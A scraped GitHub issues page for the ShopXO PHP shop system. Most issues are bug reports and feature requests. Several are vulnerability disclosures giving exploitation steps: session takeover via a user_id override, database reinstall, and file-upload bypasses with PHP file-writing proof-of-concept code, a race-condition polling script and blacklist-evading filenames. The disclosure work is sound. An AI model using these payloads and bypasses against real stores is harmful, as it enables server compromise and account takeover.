gongfuxiang / shopxo Goto Github PK
View Code? Open in Web Editor NEWShopXO企业级免费开源商城系统,可视化DIY拖拽装修、包含PC、H5、多端小程序(微信+支付宝+百度+头条&抖音+QQ+快手)、APP、多仓库、多商户、多门店、IM客服,进销存遵循MIT开源协议发布、基于ThinkPHP8框架研发
Home Page: https://shopxo.net
License: MIT License
ShopXO企业级免费开源商城系统,可视化DIY拖拽装修、包含PC、H5、多端小程序(微信+支付宝+百度+头条&抖音+QQ+快手)、APP、多仓库、多商户、多门店、IM客服,进销存遵循MIT开源协议发布、基于ThinkPHP8框架研发
Home Page: https://shopxo.net
License: MIT License
把 application\lang\zh-cn.php 369行的 '^1((3|5|8|7){1}\d{1})\d{8}$'替换为以下 ^1([358][0-9]|4[579]|66|7[0135678]|9[89])[0-9]{8}$
商品编辑页面没有修改库存数量的地方,默认的库存为0
APPLICATION、$params['user_id']可以被用户控制,存在变量覆盖问题。
利用修改头像接口
1、添加参数application=app跟参数user_id,导致$params['user_id']用户id变成用户指定id
2、进入UserLoginRecord方法,这里好像没啥问题
3、进入UserAvatarUpload方法,这里完成图片上传后又调用了UserLoginRecord方法
4、再进入UserLoginRecord方法。因为这次调用没有指定$is_app,默认为false
这就导致了最终结果变成当前session存储的用户变成用户指定的任意用户id,并且这个id是一个可以猜测的简单数字
5、最终效果
重现步骤:
您好:
我是360代码卫士的工作人员,在我们的开源代码审计过程中,发现shopxo存在系统重装漏洞,详细信息如下:
在shopxo\application\install\controller\Index.php文件中,Add方法中没有校验锁文件,导致攻击者可以重装数据库。
构造如下post请求
可以发现本地数据库中新建了一个shopxo2的数据库,实际场景中攻击者可以在自己额公网服务器中的数据库开启远程连接,连上自己的数据库
最关键的地方是数据库配置文件也修改了
这个地方可以通过写入php代码来getshell,由于是在github上,详细信息就不具体说了,如果您对后面getshell的方法流程感兴趣,很乐意通过邮件告诉您
作者你好,如何关闭移动端,手机访问只显示PC端
都有200k大
毕竟已经不维护了
When uploading payment plug-ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive upload
In the Upload method in the application\service\PaymentService.php file, the file_put_contents function parameter is controllable
But later call GetPaymentConfig method to do file verification, if the file verification is not passed, the file will be deleted
In the GetPaymentConfig method, the class_exists function checks whether the class is defined, the class uses the fully qualified name, and then it checks whether there are three methods defined in the class
According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows:
<?php
namespace payment;
class a{
public function __construct($params = [])
{
phpinfo();
}
public function Config()
{
}
public function Pay()
{
}
public function Respond()
{
}
}
$b=new a();
?>
Finally, the method is called in application\admin\controller\Payment.php
After logging in to the background, upload the zip package containing a.php at the site management -> payment method -> upload
Visit extend/payment/a.php
Not by constructing code:
The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in /thinkphp/library/think/Loader.php
findFile is the function of thinkphp to find files. It is mainly loaded through psr-4 and classmap. The fully qualified name of the class we passed in is returned by the findFile function and finally spliced into the complete file path.
Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation
At this point, we have not entered the following file deletion operation but included the file, and the code will also be executed.
Upload the zip archive containing the php file at the same location, the code content is:
<?php $f = '1.php'; $shell = '<?php phpinfo(); ?>'; file_put_contents($f,$shell); ?>
Although the upload failed message is returned after uploading, the code has been included and executed
The file is created in 1.php under the root directory of shopxo installation, visit 1.php
There are also problems with uploading files and then deleting files. If there is no file included here, there is another way to upload files is competitive upload, because there is a time difference from file verification to file deletion, and you can keep uploading while keeping access.
I use burpsuite's intruder module to keep sending packages and python scripts to keep accessing
The Python script is as follows:
import requests
url='http://url/extend/payment/2.php'
while True:
s=requests.get(url)
if 'phpinfo' in s.text:
print(s.text)
exit()
Upload the php file in the compressed package as follows:
<?php
phpinfo();
$f = '1.php';
$shell = '<?php phpinfo(); ?>';
file_put_contents($f,$shell);
?>
The generated php file is in the extend\payment directory
Visit extend\payment\1.php
$value{0}写法要改成$value[0] 否则会报错。
涉及到数据库事务的代码, 有点乱~~~
看这里application/service/OrderService.php:399
`Db::startTrans();
// 消息通知
$detail = '订单支付成功,金额'.PriceBeautify($params['order']['total_price']).'元';
MessageService::MessageAdd($params['order']['user_id'], '订单支付', $detail, 1, $params['order']['id']);
// 更新订单状态
$upd_data = array(
'status' => 2,
'pay_status' => 1,
'pay_price' => $pay_price,
'payment_id' => $params['payment']['id'],
'pay_time' => time(),
'upd_time' => time(),
);
if(Db::name('Order')->where(['id'=>$params['order']['id']])->update($upd_data))
{
// 添加状态日志
if(self::OrderHistoryAdd($params['order']['id'], 2, $params['order']['status'], '支付', 0, '系统'))
{
// 库存扣除
$ret = BuyService::OrderInventoryDeduct(['order_id'=>$params['order']['id'], 'order_data'=>$upd_data]);
if($ret['code'] != 0)
{
// 事务回滚
Db::rollback();
return DataReturn($ret['msg'], -10);
}
// 提交事务
Db::commit();
return DataReturn('支付成功', 0);
}
}
// 事务回滚
Db::rollback();`
bug: 退款时选择了理由后立即提示:请选择退款理由
2.2.0 从github安装后,购买商品时,选择商品规格报错: 商品id有误。订单提交后报错:商品信息为空
第11、62、360行
<th width="25%">坏境</th>
字错了
Whether this system can make a fuss about financial analysis, or as part of an invoicing system, I mainly want to add some elements of financial analysis.
我看了很久index模块下user控制器下index方法里面有很多钩子,没看到有什么效果,很迷惑。
商品预售(预约),定金支付、定金抵扣(定金翻倍功能)。
后台管理: 网站管理 -> 导航管理 抛出未定义数组索引: items
错误
点击个人中心是提出alert框:百度未授权使用地图API,可能是因为您提供的密钥不是有效的百度LBS开放平台密钥,或此密钥未对本应用的百度地图JavaScriptAPI授权。您可以访问如下网址了解如何获取有效的密钥:http://lbsyun.baidu.com/apiconsole/key#
请问如何解决呢?
application/service/PaymentService.php 153 $payment 三元运算符 :后面是否是空字符串,现在是$payment
查找了原因,发现使用CDN后,使用系统内置函数 GetClientIP 获取到的用户IP为:
218.17.xx.xx,218.93.204.51,36.42.75.103
变成了逗号分隔的三段式,后两个均为CDN的节点IP。
$ips = explode(',' $onlineip);
建议 return reset($ips);
比如商品库存剩1,A和B同时读取到,一起下单,结果库存变成-1。
我粗略看了一下源码,貌似没有看到加锁的部分。
如题。
Feature Request: 添加微信地址一键导入功能
支付宝有演示的吗?我在支付宝小程序里没有搜索到shopxo
Hey there!
I'd like to report a security issue but cannot find contact instructions on your repository.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
点击后台,站点设置,网站搜索,搜索,扩展均报错。
as title
首先给你们点个赞,相当好的项目,整洁清晰,甩其他开源项目好几条街。
有没有试过在plesk上部署?按照教程部署完之后,直接炸了,连plesk也打不开了,"Err_Connection_Refused", 连ssh也连不上机器,重启后一直崩溃无法连接。。。
后来重新试了一两个新机器,目前稳定的设置以下
ubuntu 18, cpu x 1, ram x 2gb
Plesk Obsidian 18.0.20
7.3.11, FPM application served by nginx
Mariadb 10
lets encrypt
问题好像出在将runtime文件夹设置为777,因该在cache上出了点问题,不知道怎么直接把plesk给炸了。plesk上的所有网站都无法响应了"Err_Connection_Refused",但是还可以通过8443端口连接到后台,然后显示apache和nginx服务都正常运行,cpu高峰才47%,ram最高490mb。。。瞎折腾一番结果连8443端口也炸了,ssh也无法连接。。。幸好是台dev机器。。。
后来删了重装plesk,再次部署shopxo1.7,没有设置runtime权限,保留其原来权限755,目前网站后台(admin.php)只崩溃过几次,499,503,504,也没有波及到plesk及其他网站。
由于之前机器完全废了,所以提供不了更多信息,目前在不设置runtime777的情况下还是稳定的,要是再崩溃的话,我会提供更多信息。
how can i diy coupon price for goods
You previously fixed one vulnerability of the theme file upload .
But now there is a similar vulnerability in /app/admin/appmini.php
,because you didn't use the above method.
http://localhost:3000/admin.php?s=appmini/index/nav_type/weixin/view_type/upload.html
Then my file will be uploaded to sourcecode/weixin/
And i can bypass the !IS_AJAX
,even upload my files to any writable directory using ../
.
admin.php?s=appmini/themeupload&ajax=ajax
The file upload vulnerability here lies in the blacklist method used when verifying the suffix of the uploaded file. This verification method is not strict and is often bypassed by attackers in various ways
The PluginsUpload method in the application\service\PluginsAdminService.php file has a file creation operation, in which the input of the file_put_contents function is controllable
Line 1072 checks the file suffix name, here is the blacklist check
The value in the private static variable $exclude_ext is ‘.php’, which can easily be bypassed
There are many ways to bypass the blacklist verification of suffix names. Taking my local Windows system environment as an example, you can upload file names that do not conform to the Windows file naming rules
shell.php::$DATA
shell.php::$DATA…….
shell.php.
shell.php(空格)
shell.php:1.jpg
The windows system will automatically remove the content behind the symbols that do not conform to the rules. You can change the file suffix in the linux environment and upload it to the website
Through the audit of the PluginsUpload method in the PluginsAdminService.php file
When the zip archive does not match the resource directory, it will jump out of the loop of reading the archive file
And the resource directory cannot be controller, because the directory corresponding to controller exists, and the compressed package will be closed directly without entering the subsequent file writing operation
Finally, the method is called in the Upload method of the application\admin\controller\Pluginsadmin.php file
The attacker can upload such a compressed package after logging into the background system
And upload the compressed package at Application Center -> Application Management -> Upload Application
Visit public\static\upload\file_uploadfile_\shell.php
In application\service\ThemeService.php there is also the same blacklist verification problem for uploaded files
The processing logic is very similar to the above file
After logging in to the system, upload the zip archive at the site management -> theme management -> theme installation
Visit public\static\index\test.php after uploading
有支持第三方入驻的计划么,类似京东这样的。
安装的时候提示 Array and string offset access syntax with curly braces is deprecated
当面付可以不用营业执照
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.